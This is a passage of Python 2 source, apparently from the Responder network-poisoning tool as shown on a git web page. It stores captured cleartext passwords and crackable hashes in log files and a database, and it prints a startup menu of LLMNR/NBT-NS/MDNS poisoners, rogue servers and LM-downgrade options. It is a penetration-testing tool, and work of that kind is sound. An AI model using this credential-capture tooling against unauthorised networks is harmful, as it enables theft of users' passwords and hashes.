fname = '%s-%s-ClearText-%s.txt' % (result['module'], result['type'], result['client'])
|
||||||
|
else:
|
||||||
|
fname = '%s-%s-%s.txt' % (result['module'], result['type'], result['client'])
|
||||||
|
|
||||||
|
logfile = os.path.join(settings.Config.ResponderPATH, 'logs', fname)
|
||||||
|
|
||||||
|
cursor = sqlite3.connect(settings.Config.DatabaseFile)
|
||||||
|
cursor.text_factory = sqlite3.Binary # We add a text factory to support different charsets
|
||||||
|
res = cursor.execute("SELECT COUNT(*) AS count FROM responder WHERE module=? AND type=? AND client=? AND LOWER(user)=LOWER(?)", (result['module'], result['type'], result['client'], result['user']))
|
||||||
|
(count,) = res.fetchone()
|
||||||
|
|
||||||
|
if not count:
|
||||||
|
with open(logfile,"a") as outf:
|
||||||
|
if len(result['cleartext']): # If we obtained cleartext credentials, write them to file
|
||||||
|
outf.write('%s:%s\n' % (result['user'].encode('utf8', 'replace'), result['cleartext'].encode('utf8', 'replace')))
|
||||||
|
else: # Otherwise, write JtR-style hash string to file
|
||||||
|
outf.write(result['fullhash'].encode('utf8', 'replace') + '\n')
|
||||||
|
|
||||||
|
cursor.execute("INSERT INTO responder VALUES(datetime('now'), ?, ?, ?, ?, ?, ?, ?, ?)", (result['module'], result['type'], result['client'], result['hostname'], result['user'], result['cleartext'], result['hash'], result['fullhash']))
|
||||||
|
cursor.commit()
|
||||||
|
|
||||||
|
|
||||||
|
if not count or settings.Config.Verbose: # Print output
|
||||||
|
if len(result['client']):
|
||||||
|
print text("[%s] %s Client : %s" % (result['module'], result['type'], color(result['client'], 3)))
|
||||||
|
|
||||||
|
if len(result['hostname']):
|
||||||
|
print text("[%s] %s Hostname : %s" % (result['module'], result['type'], color(result['hostname'], 3)))
|
||||||
|
|
||||||
|
if len(result['user']):
|
||||||
|
print text("[%s] %s Username : %s" % (result['module'], result['type'], color(result['user'], 3)))
|
||||||
|
|
||||||
|
# Bu order of priority, print cleartext, fullhash, or hash
|
||||||
|
if len(result['cleartext']):
|
||||||
|
print text("[%s] %s Password : %s" % (result['module'], result['type'], color(result['cleartext'], 3)))
|
||||||
|
|
||||||
|
elif len(result['fullhash']):
|
||||||
|
print text("[%s] %s Hash : %s" % (result['module'], result['type'], color(result['fullhash'], 3)))
|
||||||
|
|
||||||
|
elif len(result['hash']):
|
||||||
|
print text("[%s] %s Hash : %s" % (result['module'], result['type'], color(result['hash'], 3)))
|
||||||
|
|
||||||
|
# Appending auto-ignore list if required
|
||||||
|
# Except if this is a machine account's hash
|
||||||
|
if settings.Config.AutoIgnore and not result['user'].endswith('$'):
|
||||||
|
settings.Config.AutoIgnoreList.append(result['client'])
|
||||||
|
print color('[*] Adding client %s to auto-ignore list' % result['client'], 4, 1)
|
||||||
|
else:
|
||||||
|
print color('[*] Skipping previously captured hash for %s' % result['user'], 3, 1)
|
||||||
|
text('[*] Skipping previously captured hash for %s' % result['user'])
|
||||||
|
cursor.execute("UPDATE responder SET timestamp=datetime('now') WHERE user=? AND client=?", (result['user'], result['client']))
|
||||||
|
cursor.commit()
|
||||||
|
cursor.close()
|
||||||
|
|
||||||
|
|
||||||
|
def Parse_IPV6_Addr(data):
|
||||||
|
if data[len(data)-4:len(data)][1] =="\x1c":
|
||||||
|
return False
|
||||||
|
elif data[len(data)-4:len(data)] == "\x00\x01\x00\x01":
|
||||||
|
return True
|
||||||
|
elif data[len(data)-4:len(data)] == "\x00\xff\x00\x01":
|
||||||
|
return True
|
||||||
|
return False
|
||||||
|
|
||||||
|
def Decode_Name(nbname): #From http://code.google.com/p/dpkt/ with author's permission.
|
||||||
|
try:
|
||||||
|
from string import printable
|
||||||
|
|
||||||
|
if len(nbname) != 32:
|
||||||
|
return nbname
|
||||||
|
|
||||||
|
l = []
|
||||||
|
for i in range(0, 32, 2):
|
||||||
|
l.append(chr(((ord(nbname[i]) - 0x41) << 4) | ((ord(nbname[i+1]) - 0x41) & 0xf)))
|
||||||
|
|
||||||
|
return filter(lambda x: x in printable, ''.join(l).split('\x00', 1)[0].replace(' ', ''))
|
||||||
|
except:
|
||||||
|
return "Illegal NetBIOS name"
|
||||||
|
|
||||||
|
|
||||||
|
def NBT_NS_Role(data):
|
||||||
|
return {
|
||||||
|
"\x41\x41\x00":"Workstation/Redirector",
|
||||||
|
"\x42\x4c\x00":"Domain Master Browser",
|
||||||
|
"\x42\x4d\x00":"Domain Controller",
|
||||||
|
"\x42\x4e\x00":"Local Master Browser",
|
||||||
|
"\x42\x4f\x00":"Browser Election",
|
||||||
|
"\x43\x41\x00":"File Server",
|
||||||
|
"\x41\x42\x00":"Browser",
|
||||||
|
}.get(data, 'Service not known')
|
||||||
|
|
||||||
|
|
||||||
|
def banner():
|
||||||
|
banner = "\n".join([
|
||||||
|
' __',
|
||||||
|
' .----.-----.-----.-----.-----.-----.--| |.-----.----.',
|
||||||
|
' | _| -__|__ --| _ | _ | | _ || -__| _|',
|
||||||
|
' |__| |_____|_____| __|_____|__|__|_____||_____|__|',
|
||||||
|
' |__|'
|
||||||
|
])
|
||||||
|
|
||||||
|
print banner
|
||||||
|
print "\n \033[1;33mNBT-NS, LLMNR & MDNS %s\033[0m" % settings.__version__
|
||||||
|
print ""
|
||||||
|
print " Author: Laurent Gaffie (laurent.gaffie@gmail.com)"
|
||||||
|
print " To kill this script hit CRTL-C"
|
||||||
|
print ""
|
||||||
|
|
||||||
|
|
||||||
|
def StartupMessage():
|
||||||
|
enabled = color('[ON]', 2, 1)
|
||||||
|
disabled = color('[OFF]', 1, 1)
|
||||||
|
|
||||||
|
print ""
|
||||||
|
print color("[+] ", 2, 1) + "Poisoners:"
|
||||||
|
print ' %-27s' % "LLMNR" + enabled
|
||||||
|
print ' %-27s' % "NBT-NS" + enabled
|
||||||
|
print ' %-27s' % "DNS/MDNS" + enabled
|
||||||
|
print ""
|
||||||
|
|
||||||
|
print color("[+] ", 2, 1) + "Servers:"
|
||||||
|
print ' %-27s' % "HTTP server" + (enabled if settings.Config.HTTP_On_Off else disabled)
|
||||||
|
print ' %-27s' % "HTTPS server" + (enabled if settings.Config.SSL_On_Off else disabled)
|
||||||
|
print ' %-27s' % "WPAD proxy" + (enabled if settings.Config.WPAD_On_Off else disabled)
|
||||||
|
print ' %-27s' % "Auth proxy" + (enabled if settings.Config.ProxyAuth_On_Off else disabled)
|
||||||
|
print ' %-27s' % "SMB server" + (enabled if settings.Config.SMB_On_Off else disabled)
|
||||||
|
print ' %-27s' % "Kerberos server" + (enabled if settings.Config.Krb_On_Off else disabled)
|
||||||
|
print ' %-27s' % "SQL server" + (enabled if settings.Config.SQL_On_Off else disabled)
|
||||||
|
print ' %-27s' % "FTP server" + (enabled if settings.Config.FTP_On_Off else disabled)
|
||||||
|
print ' %-27s' % "IMAP server" + (enabled if settings.Config.IMAP_On_Off else disabled)
|
||||||
|
print ' %-27s' % "POP3 server" + (enabled if settings.Config.POP_On_Off else disabled)
|
||||||
|
print ' %-27s' % "SMTP server" + (enabled if settings.Config.SMTP_On_Off else disabled)
|
||||||
|
print ' %-27s' % "DNS server" + (enabled if settings.Config.DNS_On_Off else disabled)
|
||||||
|
print ' %-27s' % "LDAP server" + (enabled if settings.Config.LDAP_On_Off else disabled)
|
||||||
|
print ""
|
||||||
|
|
||||||
|
print color("[+] ", 2, 1) + "HTTP Options:"
|
||||||
|
print ' %-27s' % "Always serving EXE" + (enabled if settings.Config.Serve_Always else disabled)
|
||||||
|
print ' %-27s' % "Serving EXE" + (enabled if settings.Config.Serve_Exe else disabled)
|
||||||
|
print ' %-27s' % "Serving HTML" + (enabled if settings.Config.Serve_Html else disabled)
|
||||||
|
print ' %-27s' % "Upstream Proxy" + (enabled if settings.Config.Upstream_Proxy else disabled)
|
||||||
|
#print ' %-27s' % "WPAD script" + settings.Config.WPAD_Script
|
||||||
|
print ""
|
||||||
|
|
||||||
|
print color("[+] ", 2, 1) + "Poisoning Options:"
|
||||||
|
print ' %-27s' % "Analyze Mode" + (enabled if settings.Config.AnalyzeMode else disabled)
|
||||||
|
print ' %-27s' % "Force WPAD auth" + (enabled if settings.Config.Force_WPAD_Auth else disabled)
|
||||||
|
print ' %-27s' % "Force Basic Auth" + (enabled if settings.Config.Basic else disabled)
|
||||||
|
print ' %-27s' % "Force LM downgrade" + (enabled if settings.Config.LM_On_Off == True else disabled)
|
||||||
|
print ' %-27s' % "Fingerprint hosts" + (enabled if settings.Config.Finger_On_Off == True else disabled)
|
||||||
|
print ""
|
||||||
|
|
||||||
|
print color("[+] ", 2, 1) + "Generic Options:"
|
||||||
|
print ' %-27s' % "Responder NIC" + color('[%s]' % settings.Config.Interface, 5, 1)
|
||||||
|
print ' %-27s' % "Responder IP" + color('[%s]' % settings.Config.Bind_To, 5, 1)
|
||||||
|
print ' %-27s' % "Challenge set" + color('[%s]' % settings.Config.NumChal, 5, 1)
|
||||||
|
|
||||||
|
if settings.Config.Upstream_Proxy:
|
||||||
|
print ' %-27s' % "Upstream Proxy" + color('[%s]' % settings.Config.Upstream_Proxy, 5, 1)
|
||||||
|
if len(settings.Config.RespondTo):
|
||||||
|
print ' %-27s' % "Respond To" + color(str(settings.Config.RespondTo), 5, 1)
|
||||||
|
if len(settings.Config.RespondToName):
|
||||||
|
print ' %-27s' % "Respond To Names" + color(str(settings.Config.RespondToName), 5, 1)
|
||||||
|
if len(settings.Config.DontRespondTo):
|
||||||
|
print ' %-27s' % "Don't Respond To" + color(str(settings.Config.DontRespondTo), 5, 1)
|
||||||
|
if len(settings.Config.DontRespondToName):
|
||||||
|
print ' %-27s' % "Don't Respond To Names" + color(str(settings.Config.DontRespondToName), 5, 1)
|
||||||
|
print "\n\n"
|
||||||
|
|
||||||
Reference in New Issue
Block a user